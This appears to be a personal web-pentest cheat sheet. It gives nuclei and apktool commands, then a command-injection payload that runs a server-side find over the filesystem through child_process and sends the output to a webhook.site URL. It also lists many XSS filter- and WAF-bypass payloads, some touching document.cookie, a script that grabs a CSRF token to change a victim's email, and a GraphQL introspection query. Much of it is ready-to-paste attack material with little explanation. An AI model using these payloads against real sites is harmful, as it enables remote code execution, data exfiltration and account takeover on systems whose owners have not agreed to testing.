Info
This page is place where I store command, configuration and moreover around information security.
Nuclei
Info
Fast and customizable vulnerability scanner based on simple YAML based DSL.
Install nuclei
For install nuclei, you need to make sure your host installed golang, that is the fastest way to help you install nuclei for your host
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latestOr you can try to install binary version from release page of nuclei
wget https://github.com/projectdiscovery/nuclei/releases/download/v3.3.0/nuclei_3.3.0_linux_amd64.zip
mkdir -p nuclei_unzip
unzip -d nuclei_unzip nuclei_3.3.0_linux_amd64.zip
sudo mv ./nuclei_unzip/nuclei /usr/local/bin
rm -rf nuclei_unzip nuclei_3.3.0_linux_amd64.zipSetup nuclei-templates for default
Info
I will become useful to cut off or you want specific your
nuclei-templatesand update that to become default templates ofnucleion run and target
nuclei -update-template-dir /path/to/your/nuclei-templates/Specific template and tags for scan with sort of endpoints
nuclei -tags lfi,ssrf,rce -t dast/vulnerabilities/ -l targets.txtRun nuclei with android app
With android platform, when you try to pentest this platforms, you will need bunch of tools to help you handle
- apktool : A tool for reverse engineering Android apk files
- mobile-nuclei-templates :
nuclei-templatesfor mobile platforms
First of all, you need to reverse your apk to metadata and information include inside this target with apktool
java -jar apktool_2.9.3.jar d /path/to/apk -o /path/to/output_apktoolNow you can use nuclei to perform scanning inside output of apktool
# NOTE: Install mobile nuclei template with mobile inside your default nuclei-templates location
echo /path/to/output_apktool | nuclei -t mobile/Command Injection
With webhook
<embed src=1 onload="fetch(./?eval=require( 'child_process' ).spawnSync( 'find', ['/']).stdout.toString()).then(a=>a.text()).then(a=>fetch('https://webhook.site/ae0bd822-b34b-4e87-aa65-3c22bc4c9999?c=%27+btoa(a)))%22%3ENote
Command will exec a find command in location
/after that send all that to plain text to webhook in URLhttps://webhook.site/...
Cross Site Scripting ( XSS )
Unique scripts which used to bypass specify situations
onmouseover="alert('xss')
"><svg onload="alert('xss')">
<img src=# onerror='alert(1)'>
javascript:alert('xss')
'-alert(document.domain)-'
';alert(document.domain)//
<svg><animatetransform onbegin=alert(1) attributeName=transform>DOM XSS with Angular expression
{{constructor.constructor('alert(1)')()}}Arithmetic operator with JSΒ β> Cause Reflected DOM XSS
\"-alert(1)}//Stored DOM XSS bypass the encode bracket
<><img src=1 onerror=alert(1)>Script for executing CSRF Form for XSS by using token CSRF
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>Tip for causing XSS with block by WAF (web applications firewall)
- Brute force to find the tag can available
- Try to execute attribute with tag available
- And force the website do the eventΒ β> Execute the XSS. For example
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>Use own tag
Info
If on situation the server block all of tag can inject into the codeΒ β> we need to create them own likeΒ
<xss>
<xss+id=x+onfocus=alert(document.cookie) tabindex=1>#xPayload can help you filter xss via press event by key button to causing the reflect
%27accesskey=%27x%27onclick=%27alert(1)Add \ splash for bypass filter
Info
If some case study like they add black splashΒ
/Β after you input that with quote so with causing reflect xss using close tag for</script>Β for ignore that situation and after that causing payload
<\script><script>alert(1)<\script>GraphQL
Info
The helpful reference is put on this article Hackwekend - Session 3 Attack and Exploit GraphQL
GraphQL with get full introspection
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
types {
...FullType
}
directives {
name
description
locations
args {
...InputValue
}
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type { ...TypeRef }
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}